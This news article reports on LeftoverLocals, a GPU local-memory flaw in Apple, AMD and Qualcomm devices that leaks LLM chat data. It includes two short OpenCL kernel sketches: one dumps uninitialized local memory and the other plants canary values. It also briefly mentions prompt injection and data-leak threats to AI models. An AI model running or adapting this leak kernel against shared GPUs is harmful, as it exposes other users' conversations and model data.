
Popular GPUs Used in AI Systems Vulnerable to Memory Leak

LeftoverLocals Affects Apple, AMD and Qualcomm Devices
Researchers from Trail of Bits said they can reproduce LLM chat sessions through an attack on a GPU. (Image: Shutterstock)

Researchers uncovered a critical vulnerability in the graphics processing units of popular devices that could allow attackers to access data from large language models.


The flaw, dubbed LeftoverLocals, affects the GPU frameworks of Apple, AMD and Qualcomm devices. Researchers at security firm Trail of Bits, who uncovered the flaw, said it stems from the affected devices failing to isolate GPU local memory between kernels, allowing an attacker to write a short GPU kernel that dumps leftover data from that memory.
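For illustration, the leak primitive can be sketched as a single OpenCL C kernel that declares a local array, never initializes it, and copies its contents to a host-visible buffer; on a vulnerable GPU, the copied values are whatever a previous kernel left behind. The kernel name, buffer name and array size below are illustrative assumptions, not the researchers' actual code.

    // Hypothetical "dump" kernel (names and sizes are illustrative).
    // It never initializes its local array, so on a vulnerable GPU the
    // copied-out values are whatever the previous kernel left behind.
    #define LM_WORDS 4096                          // assumed size of the local array, in 32-bit words

    __kernel void dump_local(__global uint *out) {
        __local uint lm[LM_WORDS];                 // deliberately left uninitialized
        for (uint i = get_local_id(0); i < LM_WORDS; i += get_local_size(0)) {
            // Copy the stale contents of local memory to a host-visible buffer.
            out[get_group_id(0) * LM_WORDS + i] = lm[i];
        }
    }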

To orchestrate the hack, the researchers ran llama.cpp, an open-source framework for Meta's Llama large language model, on an AMD Radeon RX 7900 XT GPU. They also used OpenCL, an open standard for GPU programming, to compile two kernel programs dubbed Listener and Writer.

Writer filled the GPU's local memory with known canary values, and Listener read uninitialized local memory to see what data remained. When the researchers ran the two programs alongside the LLM application, the target device dumped leftover memory from the model's computations.
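A Writer-style kernel can be sketched in OpenCL C along the following lines, again with illustrative names and values: it stamps local memory with a known canary so that a separate listening process, essentially the dump kernel sketched above, can tell leaked data from noise by counting words that differ from the canary.

    // Hypothetical Writer-style kernel (names and values are illustrative).
    // It fills local memory with a known canary so a separate listening
    // process can distinguish genuinely leaked data from random noise.
    #define LM_WORDS 4096
    #define CANARY   0x1337BEEFu

    __kernel void writer(__global uint *keepalive) {
        __local uint lm[LM_WORDS];
        for (uint i = get_local_id(0); i < LM_WORDS; i += get_local_size(0)) {
            lm[i] = CANARY;                        // stamp every word of local memory
        }
        barrier(CLK_LOCAL_MEM_FENCE);              // ensure all writes land before the kernel exits
        if (get_local_id(0) == 0) {
            keepalive[get_group_id(0)] = lm[0];    // read one word back so the writes are not optimized away
        }
    }

On a GPU that properly isolates local memory, a later kernel should never observe the canary; the LeftoverLocals flaw means it can.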

The researchers said they were able to recover roughly 181 megabytes of data from a single LLM query and that the technique could allow attackers to reconstruct chat sessions and access model parameters and outputs, broadening the overall threat to LLM deployments.

"Implementing these attacks is not difficult and is accessible to amateur programmers," the researchers said. They said open-source LLMs are particularly susceptible to the vulnerability, as parts of the machine learning stacks are not "rigorously reviewed by security experts."

Apple rolled out limited patches for the flaw, while Qualcomm and AMD said they are continuing to evaluate the vulnerability, according to the researchers.

The warning from the Trail of Bits researchers roughly coincides with an alert from the U.S. National Institute of Standards and Technology saying that generative AI systems remain susceptible to prompt injection and data leak threats due to the complexity of their software environments (see: NIST Warns of Cyberthreats to AI Models).

"Because the datasets used to train an AI are far too large for people to successfully monitor and filter, there is no foolproof way as yet to protect AI from misdirection," NIST said.


About the Author

Akshaya Asokan

Senior Correspondent, ISMG

Asokan is a U.K.-based senior correspondent for Information Security Media Group's global news desk. She previously worked with IDG and other publications, reporting on developments in technology, minority rights and education.




